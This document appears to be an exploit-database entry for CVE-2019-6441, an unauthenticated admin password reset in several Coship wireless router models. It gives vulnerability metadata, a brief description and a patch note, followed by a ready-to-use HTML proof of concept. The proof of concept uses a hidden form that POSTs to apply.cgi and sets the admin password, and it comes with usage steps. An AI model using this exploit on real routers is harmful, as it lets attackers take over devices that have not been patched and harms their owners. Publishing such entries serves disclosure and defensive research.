Coship Wireless Router – Unauthenticated Admin Password Reset

vendor:

Wireless Router

by:

Adithyan AK

9.8

CVSS

CRITICAL

Unauthenticated Admin Password Reset

287

CWE

Product Name: Wireless Router

Affected Version From: Coship RT3052 - 4.0.0.48, Coship RT3050 - 4.0.0.40, Coship WM3300 - 5.0.0.54, Coship WM3300 - 5.0.0.55, Coship RT7620 - 10.0.0.49.

Affected Version To: Coship RT3052 - 4.0.0.48, Coship RT3050 - 4.0.0.40, Coship WM3300 - 5.0.0.54, Coship WM3300 - 5.0.0.55, Coship RT7620 - 10.0.0.49.

Patch Exists: YES

Related CWE: CVE-2019-6441

CPE: 2.3:h:coship:rt3052:4.0.0.48

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: MacOS Mojave v.10.14

2019

Coship Wireless Router – Unauthenticated Admin Password Reset

A vulnerability in Coship Wireless Routers allows an unauthenticated attacker to reset the admin password without authentication. This is due to the lack of authentication in the ‘apply.cgi’ page. An attacker can exploit this vulnerability by sending a crafted HTTP request to the router’s IP address with the new password in the request body. This will reset the admin password to the new password without authentication.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update their routers to the latest version.

Source

Exploit-DB raw data:

<!--
# Exploit Title: Coship Wireless Router – Unauthenticated Admin Password Reset
# Date: 15.01.2019
# Exploit Author: Adithyan AK
# Vendor Homepage: http://en.coship.com/
# Category: Hardware (Wifi Router)
# Affected Versions : Coship RT3052 - 4.0.0.48, Coship RT3050 - 4.0.0.40, Coship WM3300 - 5.0.0.54, Coship WM3300 - 5.0.0.55, Coship RT7620 - 10.0.0.49.
# Tested on: MacOS Mojave v.10.14
# CVE: CVE-2019-6441

# Change the X.X.X.X in poc to Router Gateway address and save the below code as Exploit.html
# Open Exploit.html with your Browser
# Click on “Submit request”
# Password of the admin will now be changed as "password123"

# PoC :
-->

<html>
  <!-- Change the X.X.X.X with the router's IP address -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://X.X.X.X/apply.cgi" method="POST">
      <input type="hidden" name="page" value="regx/management/accounts.asp" />
      <input type="hidden" name="http_username" value="admin" />
      <input type="hidden" name="http_passwd" value="password123" />
      <input type="hidden" name="usr_confirm_password" value="password123" />
      <input type="hidden" name="action" value="Submit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>